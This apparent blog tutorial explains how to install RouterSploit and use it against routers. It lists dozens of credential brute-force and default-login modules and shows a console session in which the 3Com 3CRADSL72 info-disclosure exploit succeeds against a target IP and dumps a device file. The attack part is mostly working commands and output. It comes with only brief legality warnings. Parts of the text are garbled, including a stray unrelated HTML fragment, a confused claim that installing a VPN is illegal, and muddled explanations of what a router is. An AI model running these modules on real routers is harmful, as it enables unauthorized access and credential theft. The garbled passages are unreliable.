So, you want to exploit a router through RouterSploit, pretty sure that the reason for doing this is probably because you want to reset and update your firmware and credentials as there is malware that can hack into and attack your router.
First Off, What Is A Router?
A router is a small machine usually attached to your computer. It’s a networking device that brings data through data packets between computer networks to the internet and your display. Also known as WiFi, if you have a router, then for sure, you will have WiFi, and many devices can connect to it. You can access your WiFi router with these guides and get a deeper understanding.
What Is Routersploit?
RouterSploit is a simple framework or python program that can scan your router’s networks and devices connected to it to check whether it has vulnerabilities easily exploited by malware.
NOTE: Before proceeding, please be careful, and this should not be used for unlawful purposes as it is illegal to hack into routers or install thebestvpn to secure your connection.
RouterSploit can be installed in Windows, Linux, Mac OS, or OS X and also on unrooted Android phones.
Essentials – 1
To perform this framework, you will need Python installation and the packages.
1.Python3
2.Pysnmp
3.Gnureadline ( macOS/Mac OS X )
For installation of RouterSploit, type the given command below:
git clone https://github.com/threat9/routersploit
You will have cloned software on your device. Proceed to the folder:
cd routersploit
For Linux, use the command given below:
sudo python3 -m pip install -r requirements.txt
For mac OS and Mac OS X, use the command below:
git clone https://github.com/threat9/routersploit
cd routersploit
Sudo easy_install pip
sudo pip install -r requirements.txt
How To Run
Connect your device or computer to a network of choice with a router you want to run the scan.
Commands to run the scan:
cd
cd routersploit
sudo python ./rsf.py
Once you’re in, you will see that the RouterSploit Framework has opened up, and yes, it looks very similar to the Metasploit Framework. Display-wise and task wise.
It is very easy to use as you just need to insert commands on RouterSploit to run scans and find vulnerabilities or exploit routers. The commands down below:
creds/generic/snmp_bruteforce creds/generic/telnet_default creds/generic/ssh_default creds/generic/ftp_bruteforce creds/generic/http_basic_digest_bruteforce creds/generic/ftp_default creds/generic/http_basic_digest_default creds/generic/ssh_bruteforce creds/generic/telnet_bruteforce creds/routers/ipfire/ssh_default_creds creds/routers/ipfire/telnet_default_creds creds/routers/ipfire/ftp_default_creds creds/routers/bhu/ssh_default_creds creds/routers/bhu/telnet_default_creds creds/routers/bhu/ftp_default_creds creds/routers/linksys/ssh_default_creds creds/routers/linksys/telnet_default_creds creds/routers/linksys/ftp_default_creds creds/routers/technicolor/ssh_default_creds creds/routers/technicolor/telnet_default_creds creds/routers/technicolor/ftp_default_creds creds/routers/asus/ssh_default_creds creds/routers/asus/telnet_default_creds creds/routers/asus/ftp_default_creds creds/routers/billion/ssh_default_creds creds/routers/billion/telnet_default_creds creds/routers/billion/ftp_default_creds creds/routers/zte/ssh_default_creds creds/routers/zte/telnet_default_creds
Above are a few commands, which can be used.
Now, you have to run scans to find vulnerabilities but before that, use tools like arp, Nmap, and VPNs because most routers have IP addresses.
192.168.0.1
Once you’ve typed the command, the image above will pop onto your screen, showing what tools we need and the default target port, which is 80.
Type the IP address
192.168.0.1
Then type “run.”
This will be shown on your screen, which indicates all the threats and vulnerabilities on your router. This Procedure will also show the vulnerabilities on the devices connected to the network that your router provides.
Now moving on to target and exploit, type the command below:
use exploits/routers/3com/3cradsl72_info_disclosure
show options
you will see this on your screen, which shows what is vulnerable
is (AutoPwn) > use exploits/routers/3com/3cradsl72_info_disclosure
show options
is (3Com 3CRADSL72 Info Disclosure) > show options
Target options:
Name Current settings Description
—- —————- ———–
target Target IPv4 or IPv6 address
rsf (3Com 3CRADSL72 Info Disclosure) > set target 10.11.0.4
[+] {'target': '10.11.0.4'}
rsf (3Com 3CRADSL72 Info Disclosure) > check/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7.site-package … reRequestWarning: Unverified HTTPS request is being made. Adding certificate https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings InsecureRequestWarning)
[+] Target is vulnerablersf (3Com 3CRADSL72 Info Disclosure) >
Now you have the vulnerabilities, and you have to run the scan.
rsf (3Com 3CRADSL72 Info Disclosure) > run[*] Running module… [*] Sending request to download sensitive information
/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7.site-package … reRequestWarning: Unverified HTTPS request is being made. Adding certificate https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings InsecureRequestWarning)
[+] Exploit success [*] Reading /app_sta.stm file<!doctype html>
<html class=””>
<!–
We are hiring software developers! https://www.paessler.com/jobs
–>
<head>
<link rel=”manifest” href=”/public/manifest.json.htm”>
<meta httlp-equiv=”X-UA-Compatible” content=”IE-edge,chrome=1″>
<meta name=”viewport” content=”width=device-width.initial-scale”>
This is how it should look like. If your seize were accomplished, you would see settings on updating default passwords, device serial numbers, etc., provided by your router.
IMPORTANT NOTE:
This was a beginner level guide on how to install and run RouterSploit on different softwares. Once you are familiar and comfortable, you can proceed with finding vulnerabilities and exploits. Autopwn can be used for various exploits. You will discover many under Autopwn.
Before proceeding, check the information on the target router. Hacking into people’s routers is a crime and might lead to problems with the law, so please do not exploit routers until and unless you are working under government authority.
(Images from google have been used)
